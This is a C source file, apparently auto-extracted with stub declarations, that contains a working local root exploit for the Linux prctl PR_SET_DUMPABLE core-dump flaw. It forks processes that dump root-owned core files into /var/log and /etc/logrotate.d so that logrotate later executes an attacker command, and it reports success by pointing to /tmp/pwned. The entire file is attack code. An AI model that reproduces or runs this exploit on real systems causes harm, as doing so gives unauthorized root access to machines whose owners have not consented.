
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






struct stat {int dummy; } ;
struct rlimit {void* rlim_max; void* rlim_cur; } ;


 char* INFO1 ;
 char* INFO2 ;
 int PR_SET_DUMPABLE ;
 int RLIMIT_CORE ;
 void* RLIM_INFINITY ;
 int SIGSEGV ;
 int chdir (char*) ;
 int exit (int) ;
 int fork () ;
 int fprintf (int ,char*,...) ;
 int kill (int,int ) ;
 int prctl (int ,int) ;
 int pwnage ;
 int setrlimit (int ,struct rlimit*) ;
 int sleep (int) ;
 scalar_t__ stat (char*,struct stat*) ;
 int stderr ;
 int system (int ) ;

int main(void)
{
 int pid;
 struct rlimit corelimit;
 struct stat st;


 fprintf(stderr, "%s\n%s\n\n", INFO1, INFO2);


 system(pwnage);


 corelimit.rlim_cur = RLIM_INFINITY;
 corelimit.rlim_max = RLIM_INFINITY;
 setrlimit(RLIMIT_CORE, &corelimit);


 if (!(pid = fork())) {
  chdir("/var/log");
  prctl(PR_SET_DUMPABLE, 2);
  sleep(666);
  exit(1);
 }
 kill(pid, SIGSEGV);


 if (!(pid = fork())) {
  chdir("/etc/logrotate.d");
  prctl(PR_SET_DUMPABLE, 2);
  sleep(666);
  exit(1);
 }
 kill(pid, SIGSEGV);


 sleep(3);
 if ((stat("/var/log/core", &st) < 0) ||
     (stat("/etc/logrotate.d/core", &st) < 0)) {
  fprintf(stderr, "Error: Not vulnerable? See comments.\n");
  exit(1);
 }


 fprintf(stderr, "Please wait until logrotate is run and check /tmp/pwned;)\n");
 exit(0);
}
